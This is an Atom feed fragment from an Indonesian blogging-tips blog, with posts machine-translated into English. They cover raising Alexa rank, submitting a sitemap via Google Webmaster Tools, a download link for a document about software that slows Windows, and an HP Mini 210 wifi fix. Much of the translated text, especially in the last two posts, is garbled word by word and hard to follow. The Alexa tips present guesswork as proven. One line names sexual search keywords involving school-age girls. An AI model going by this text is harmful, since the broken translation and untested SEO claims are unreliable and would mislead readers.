them:&lt;br /&gt;&lt;br /&gt;   &lt;/span&gt;&lt;span title=""&gt;* Install Alexa Widget can increase the alexa rank. &lt;/span&gt;&lt;span title=""&gt;Already in the proof on my blog. &lt;/span&gt;&lt;span title=""&gt;Formerly  an 15juta now become 700 thousand. &lt;/span&gt;&lt;span title=""&gt;But this  effect on your pagerank. &lt;/span&gt;&lt;span title=""&gt;(Because you are not  directly provide a backlink to Alexa).&lt;br /&gt;   &lt;/span&gt;&lt;span title=""&gt;*  Location of your hosting an influence on your site. &lt;/span&gt;&lt;span title=""&gt;This according to my discussions and my blogging teacher, with  the basic theory if your hosting is located in the U.S., the visitor to  access your site more quickly. &lt;/span&gt;&lt;span title=""&gt;Logically, Alexa is  from where? &lt;/span&gt;&lt;span title=""&gt;Overseas right? &lt;/span&gt;&lt;span title=""&gt;Well  if you use their hosting IIX long time to open your site, so it will  help slow the rise in rank alexa rank our blog.&lt;br /&gt;   &lt;/span&gt;&lt;span title=""&gt;* Update your blog regularly. &lt;/span&gt;&lt;span title=""&gt;This seems  to be influential, because usually pagerank and alexa rank like a site  that is always up to date. &lt;/span&gt;&lt;span title=""&gt;Sites that follow the  keywords also include categories of sites that uptodate, but try to keep  your blog from porn keywords, such as videos and photos girls nude  junior high, high school, and lovely cottage student.&lt;br /&gt;   &lt;/span&gt;&lt;span title=""&gt;* Create a review about alexa. &lt;/span&gt;&lt;span title=""&gt;Currently  in the research, before I wrote this review, I 700ribuan alexa rank, if  after writing this review, my Alexa rank so 300ribuan the myth is true  and can be used as a reference.&lt;br /&gt;   &lt;/span&gt;&lt;span title=""&gt;* Create a  sub domain to boost your traffic. &lt;/span&gt;&lt;span title=""&gt;Example: If  kuliahpsikologi.dekrizky.com and iklangratis.dekrizky.com visitornya 50  per day and blog dekrizky.com visitornya 50 per day, could be a total of  100 day visitors. &lt;/span&gt;&lt;span title=""&gt;It may be true, because the  logic is like that.&lt;br /&gt;   &lt;/span&gt;&lt;span title=""&gt;* Optimize SEO on your  blog. &lt;/span&gt;&lt;span title=""&gt;SEO is where - where necessary, and can be a  weapon to boost alexa rank. &lt;/span&gt;&lt;span title=""&gt;The logic is like  this, good SEO, automatic increase visitors from search engines. &lt;/span&gt;&lt;span title=""&gt;Could affect the alexa and pagerank too lho. &lt;/span&gt;&lt;span title=""&gt;Please read the SEO tricks blogspot for more details about SEO.&lt;br /&gt;   &lt;/span&gt;&lt;span title=""&gt;* Increase Alexa backlinks. &lt;/span&gt;&lt;span title=""&gt;Alexa  backlink will be obtained if you frequently commented on the blog -  another blog alias blogwalking. &lt;/span&gt;&lt;span title=""&gt;The fact is I see  when I check my backlinks Alexa anyone, it turns out most of my comments  when blogwalking. &lt;/span&gt;&lt;span title=""&gt;Wow.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Well, that was what I meant, there is an additional bit of my  first article. &lt;/span&gt;&lt;span title=""&gt;Namely Optimization SEO (Search  Engine Optimization), Creating a Sub Domain, and Host Location. &lt;/span&gt;&lt;span title=""&gt;Of things - things that I mentioned and I read from my  friend's blog was, indeed all logical and can be practiced. &lt;/span&gt;&lt;span title=""&gt;But whatever it is, we can only guess, Alexa Rank and PageRank  is still a mystery.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Okay. &lt;/span&gt;&lt;span title=""&gt;Alexa rank so many tricks I can give. &lt;/span&gt;&lt;span style="" title=""&gt;Hope can help boost your blog ranking my friends with me to  practice this trick.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1623772732806631018?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1623772732806631018/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/12/mengingkatkan-rank-alexa.html#comment-form' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1623772732806631018'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1623772732806631018'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/12/mengingkatkan-rank-alexa.html' title='mengingkatkan Rank Alexa'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_F4BxDcSkH4w/TPzQ4mRj-EI/AAAAAAAAAZc/h0ZD2Xbh4QE/s72-c/alexa+rank.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-3722466201401002225</id><published>2010-12-26T23:28:00.000-08:00</published><updated>2011-01-22T00:22:58.858-08:00</updated><title type='text'>Membuat Sitemap</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh5.ggpht.com/rupiahhalal/SFy_UCdI1zI/AAAAAAAAAI8/1b3H5v7fhPs/s144/21.png"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 144px; height: 144px;" src="http://lh5.ggpht.com/rupiahhalal/SFy_UCdI1zI/AAAAAAAAAI8/1b3H5v7fhPs/s144/21.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text" lang="en"&gt;&lt;span style="" title=""&gt;&lt;br /&gt;&lt;script src="https://sites.google.com/site/1000trik/mas-acrom/sitemap.js"&gt;&lt;/script&gt;&lt;br /&gt;&lt;script src="http://1000trik.blogspot.com/feeds/posts/default?max-results=9999&amp;amp;alt=json-in-script&amp;amp;callback=loadtoc"&gt;&lt;/script&gt;&lt;br /&gt;What is the Sitemap that?&lt;br /&gt;&lt;/span&gt;&lt;span style="" title=""&gt;sitemap  is another word from the Sitemap, or a map and form of navigation on  the blog that aims to facilitate visitors to view the contents of a web /  blog. &lt;/span&gt;&lt;span style="" title=""&gt;It could also be said that the  sitemap is a list of contents on the blog / website. &lt;/span&gt;&lt;span style="" title=""&gt;Well, you know what that sitemap?&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="" title=""&gt;Then, what are the advantages Sitemap?. &lt;/span&gt;&lt;span title=""&gt;The advantages are as follows:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;*  Make it easier for visitors in search of an article or as an index of a  blog / website&lt;br /&gt;&lt;/span&gt;&lt;span style="" title=""&gt;* Can be a step in  facilitating the SEO (Search Engine Optimization) on our blog&lt;br /&gt;&lt;/span&gt;&lt;span style="" title=""&gt;* Blog / Web will look more neat and easy to attract  visitors&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="" title=""&gt;Site Map itself  actually can be made manually, for those of you who already know a  little coding, you can read a study guide to make a sitemap on my  friend's blog, http://teman saya/seo-membuat-sitemap-sendiri-2.htm. &lt;/span&gt;&lt;span style="" title=""&gt;But for those of you who do not really understand the  coding, there is also an easy way to create a sitemap of your blog.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;The first is to google webmaster tools&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;For users who use the Google Accounts Blogger platform, of  course familiar, the term Google Webmaster Tools.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;The secret behind Google's Webmaster, is actually a key to how  to optimize a site, either from Meta, Robots, Analysis Blog, and one of  them 'SiteMap'. &lt;/span&gt;&lt;span title=""&gt;Well, below I will explain how to  create a sitemap in blogspot.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Previously,  the site feeds you write down the address, for example;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;http://namabloganda.blogspot.com/atom.xml?redirect=false&amp;amp;start-index=1&amp;amp;max-results=100&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;* Namabloganda replace with your own blog name, becoming:  kartolocyber.blogspot.com and others - others.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Well, to make its sitemap, you can follow the steps below:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;1. &lt;/span&gt;&lt;span title=""&gt;Site Visit www.google.com /  webmasters / tools&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;2. &lt;/span&gt;&lt;span title=""&gt;If  you do not have account, Select the 'Sign Up'&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;3. &lt;/span&gt;&lt;span title=""&gt;Verify your blog with the click  'verify', and fill in the meta tag given by google under tags&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;4. &lt;/span&gt;&lt;span title=""&gt;After that save your blog, and click  'verify' in google webmaster tools&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;5. &lt;/span&gt;&lt;span title=""&gt;After terverified, click the site configuration on the left  and click again 'sitemap'&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;6. &lt;/span&gt;&lt;span title=""&gt;Click 'Submit SiteMap'&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;7. &lt;/span&gt;&lt;span title=""&gt;You can write down the address as below, on a blank column  after the name of your blog. &lt;/span&gt;&lt;span title=""&gt;Fill: feeds / posts /  default, atom.xml? Redirect = false &amp;amp; start-index = 1 &amp;amp;  max-results = 100 or atom.xml? Redirect = false&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;8. &lt;/span&gt;&lt;span title=""&gt;Choose one, or you can use the  four-four.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;9. &lt;/span&gt;&lt;span title=""&gt;Then  press the Submit button Sitemap&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;10. &lt;/span&gt;&lt;span title=""&gt;After that, if there is a picture clock, meaning your Sitemap  succeed and still in the process.&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;11. &lt;/span&gt;&lt;span title=""&gt;Done, refresh approximately half an hour later, if there is a  check mark in the status, means success&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;This is an example sitemap Kartolo blog:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;http://kartolocyber.blogspot.com/atom.xml?redirect=false&amp;amp;start-index=1&amp;amp;max-results=100&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;&lt;br /&gt;There is another practical way, to create a sitemap, without  having to list all, you can visit the website sitemap  generator-sitemaps.com www.xml&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;For the steps,  you can follow the way below:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;1. &lt;/span&gt;&lt;span title=""&gt;Log-sitemaps.com www.xml site&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;2. &lt;/span&gt;&lt;span title=""&gt;Fill in your address, the Starting column Url&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;3. &lt;/span&gt;&lt;span title=""&gt;At the option Change frequency, Last  modification, you fill None Priority Ajach ya .. &lt;/span&gt;&lt;span title=""&gt;:  D&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;4. &lt;/span&gt;&lt;span title=""&gt;Then click the  Start button&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;5. &lt;/span&gt;&lt;span title=""&gt;After  that will come out the word 'Please wait. &lt;/span&gt;&lt;span title=""&gt;Sitemap  generation in progress ... '&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;6. &lt;/span&gt;&lt;span title=""&gt;Wait, and Finish.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;Easy right? &lt;/span&gt;&lt;span title=""&gt;Direct practice deh. &lt;/span&gt;&lt;span title=""&gt;Hope can help  friends - friends who are difficult to create a sitemap on the blog. &lt;/span&gt;&lt;span title=""&gt;If you have questions langsun wrote comments. &lt;/span&gt;&lt;span title=""&gt;I definitely my best answer.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-3722466201401002225?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/3722466201401002225/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/12/membuat-sitemap.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/3722466201401002225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/3722466201401002225'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/12/membuat-sitemap.html' title='Membuat Sitemap'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh5.ggpht.com/rupiahhalal/SFy_UCdI1zI/AAAAAAAAAI8/1b3H5v7fhPs/s72-c/21.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-9144089212542270815</id><published>2010-11-08T03:05:00.000-08:00</published><updated>2010-12-26T01:19:32.675-08:00</updated><title type='text'>Software Bikin lemot Windows</title><content type='html'>&lt;span id="result_box" class="" lang="en"&gt;&lt;span title="Click for  alternate translations" class="hps"&gt;Post&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;to&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;four&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;continuation&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;of&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;problem&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;hardware&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;maintenance&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;way&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;a laptop or&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;netbook&lt;/span&gt;&lt;span class="" title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;in&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;posting&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;to the 5&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;inii&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;to discuss&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;his&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;latest&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;mastermind&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;software&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;windows system&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;can&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;also&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;make&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;errors&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;even&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;now&lt;/span&gt;&lt;span class="" title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;than&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;there&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;would be&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;in the know&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;is&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;what&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;software&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;does not&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;suport&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;with&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;our&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;system&lt;/span&gt;&lt;span class="" title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;this post&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;will&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;bring&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;you&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;to&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;friendly&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;to&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;your laptop&lt;/span&gt;&lt;span class="" title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;from doing so&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;because&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;his&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;article&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;was too&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;long&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;so&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;I&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;created&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;document&lt;/span&gt;&lt;/span&gt; &lt;a href="http://www.ziddu.com/download/12436993/Softwarepenyebablemot.rar.html"&gt;download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Trima kasih&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-9144089212542270815?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/9144089212542270815/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/11/software-bikin-lemot-windows.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/9144089212542270815'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/9144089212542270815'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/11/software-bikin-lemot-windows.html' title='Software Bikin lemot Windows'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-6319444777315844588</id><published>2010-11-03T05:09:00.000-07:00</published><updated>2010-12-26T01:19:09.534-08:00</updated><title type='text'>MASALAH WIFI LAN PADA HP MINI 210</title><content type='html'>&lt;span id="result_box" class="long_text" lang="en"&gt;&lt;span title="Click for  alternate translations" class="hps"&gt;may&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;create&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;difficulties&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;when&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;you&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;are&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;more&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;willing&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;to do&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the wifi&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;connection&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;is not&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;really&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;a connection&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;to&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the server&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;and the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;difficulty of&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;connection&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;to&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the server&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;the driver&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;kept&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;his subordinates&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;had been&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;reinstalled&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;and yet it  is&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;tetep&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;same&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;why&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;?&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;ni&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;replied&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;that&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;I&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;have&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;a laptop&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;as&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;I write&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;simple&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;aja&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;ni&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;cause&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;hell&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;especially the&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps atn"&gt;mini-&lt;/span&gt;&lt;span title="Click  for alternate translations"&gt;210&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;Hp&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;laptop&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;which is always&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;a lot of&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;the problem&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span title="Click  for alternate translations" class="hps"&gt;okay&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;let me&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;not&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;too&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;long&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;we&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;immediately&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;wrote&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;to do&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the repairs  yourself&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;without&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;the&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;services&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;laptop&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;scared&lt;/span&gt;&lt;span title="Click for alternate  translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span title="Click for alternate  translations" class="hps"&gt;first&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;uninstall&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;all&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;drivers&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;in&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;all&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;of&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;the&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;special&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;network, the&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;explanation&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;why&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;?&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;I&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;later&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;wrote&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;an&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;important&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;answer&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;was&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;yes&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;rich&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;lakuin&lt;/span&gt; &lt;span title="Click  for alternate translations" class="hps"&gt;Bluetoots&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps"&gt;LAN&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;,&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;WLAN&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;doang&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;only&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;that&lt;/span&gt;&lt;span title="Click for alternate  translations"&gt;, after&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;that&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;restart&lt;/span&gt; &lt;span title="Click for  alternate translations" class="hps atn"&gt;(&lt;/span&gt;&lt;span title="Click for  alternate translations"&gt;oh&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;yah&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;that&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;have&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;the&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;switch&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;or&lt;/span&gt; &lt;span title="Click for alternate  translations" class="hps"&gt;on&lt;/span&gt;&lt;span title="Click for alternate  translations"&gt;-off&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;)&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;is also&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;in the&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;uninstall&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;because&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;tu&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;influence&lt;/span&gt;&lt;span title="Click for alternate translations"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Click for alternate translations" class="hps"&gt;Just&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;follow&lt;/span&gt; &lt;span title="Click for alternate translations" class="hps"&gt;the instructions&lt;/span&gt;  &lt;span title="Click for alternate translations" class="hps"&gt;from&lt;/span&gt; &lt;span title="Click for alternate translations" 